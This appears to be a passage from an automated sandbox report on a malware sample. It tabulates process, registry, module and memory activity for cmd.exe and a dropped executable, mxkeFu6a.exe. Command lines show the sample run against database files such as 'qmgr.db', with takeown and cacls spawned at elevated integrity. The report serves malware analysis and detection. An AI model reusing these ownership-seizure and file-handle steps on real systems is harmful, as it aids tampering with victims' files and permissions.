1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 103 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 35 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 56, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0x138c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0x13a0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\mxkeFu6a.exe | os_pid = 0x390, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Workflow.VisualBasic.Targets" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Workflow.VisualBasic.Targets" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #25: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #25 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c mxkeFu6a.exe -accepteula "qmgr.db" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:10, Reason: Child Process |
| Unmonitor | End Time: 00:02:24, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1314 |
| Parent PID | 0x1194 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1318
0x
133C
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00CD0000 | 0x00D28FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (13)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | mxkeFu6a.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
6 | |
| Open | STD_INPUT_HANDLE | - |
|
4 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 197, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\mxkeFu6a.exe | os_pid = 0x136c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #26: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #26 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c mxkeFu6a.exe -accepteula "SmsInterceptStore.db" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:11, Reason: Child Process |
| Unmonitor | End Time: 00:02:57, Reason: Self Terminated |
| Monitor Duration | 00:00:45 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1344 |
| Parent PID | 0x1208 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1348
0x
1358
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00CD0000 | 0x00D28FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (13)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | mxkeFu6a.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
6 | |
| Open | STD_INPUT_HANDLE | - |
|
4 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 8, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\mxkeFu6a.exe | os_pid = 0x1378, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #27: mxkefu6a.exe
177
0
| Information | Value |
|---|---|
| ID | #27 |
| File Name | c:\users\fd1hvy\desktop\mxkefu6a.exe |
| Command Line | mxkeFu6a.exe -accepteula "qmgr.db" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:02:23, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x136c |
| Parent PID | 0x1314 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1370
0x
1374
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Marked Writable | - | 32-bit | - |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040F93F, 0x00407336 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004080C0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040AE73 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040579A |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040B435 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00409AC9 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040608C |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040DEC6 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00410AB1 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00412434 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00416A09, 0x00415F2F, ... |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004048D4 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040C3C0, 0x004112CE |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004020F0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75e90000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x761b0000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x750d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75b70000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74b70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x744a0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\mxkefu6a.exe, file_name_orig = C:\Users\FD1HVy\Desktop\mxkeFu6a.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x75efec50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75efeca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x75ea1170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75efeac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75ea4be0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75efeb30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x75ea4610 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x75ea4a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75efeed0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75ea5490 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x75efed40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x75ea6520 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77c0a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75ea5a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x75ea53b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x75ea6800 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x75ea5cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x75ea56c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75efed10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75ea4aa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75ea6740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75efeab0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75ea4f00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x75ea5b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75ea5010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75efea10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75ea5bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x75ea4cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75ea50d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x75ea5ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x75ea5330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x75ea5b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75ea5b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75ea51b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75ea5090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x75eff5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75efef60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75ea5d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x75eff4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75eff500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75eff130 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77bfb2d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77bfb250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x75ea6620 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77bf2dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77c129e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77c11ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75ea3cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75ea5110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75ea5c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x75ea6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75ea57f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75eff450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x75eff4a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75eff4e0 |
